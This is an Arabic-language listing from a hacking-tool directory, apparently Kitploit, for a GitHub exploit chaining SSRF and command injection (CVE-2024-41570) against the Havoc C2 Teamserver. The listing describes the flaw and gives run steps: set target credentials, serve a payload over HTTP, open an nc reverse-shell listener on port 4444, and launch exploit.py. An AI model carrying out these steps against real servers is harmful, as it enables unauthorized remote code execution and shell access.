Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-41570-Havoc-C2-RCE — هذا استغلال RCE متسلسل في إطار عمل Havoc C2 باستخدام أدوات إثبات المفهوم (PoCs) من github.com/chebuya وgithub.com/IncludeSecurity | Kitploit
أدوات/GitHubGitHub/leo-mitch/cve-2024-41570-havoc-c2-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubleo-mitch/cve-2024-41570-havoc-c2-rce

CVE-2024-41570-Havoc-C2-RCE

هذا استغلال RCE متسلسل في إطار عمل Havoc C2 باستخدام أدوات إثبات المفهوم (PoCs) من github.com/chebuya وgithub.com/IncludeSecurity

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

Havoc-C2-RCE (CVE-2024-41570)

هذا هو استغلال RCE متسلسل (CVE-2024-41570) في إطار عمل Havoc C2.

حقن الأوامر: Havoc معرض لحقن الأوامر مما يتيح لمستخدم موثّق تنفيذ أوامر على Teamserver. يؤثر على الإصدارات من 0.3 حتى أحدث إصدار 0.6. يحتوي ملف الإعداد الافتراضي في Havoc على كلمات مرور مضمّنة، لذلك يمكن لمشغّل C2 غير حريص يستخدم الملف الافتراضي على شبكة عامة أن يتم استغلاله فورًا.

SSRF: يتم استغلال هذه الثغرة عبر انتحال تسجيل وكيل Demon وفحوصاته لفتح مقبس TCP على الـ Teamserver وقراءة/كتابة البيانات منه. هذا يسمح للمهاجمين بتسريب عناوين IP الأصلية للخوادم Teamserver والمزيد.

السلسلة: إساءة استخدام SSRF لتوصيل حمولة حقن أوامر موثّقة.

كيفية الاستخدام

2025-01-19 20-01-34

root@kitploit:~
1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh

-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)

# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345

الفضل يعود إلى @chebuya و @Hyperreality

تنزيل الأداة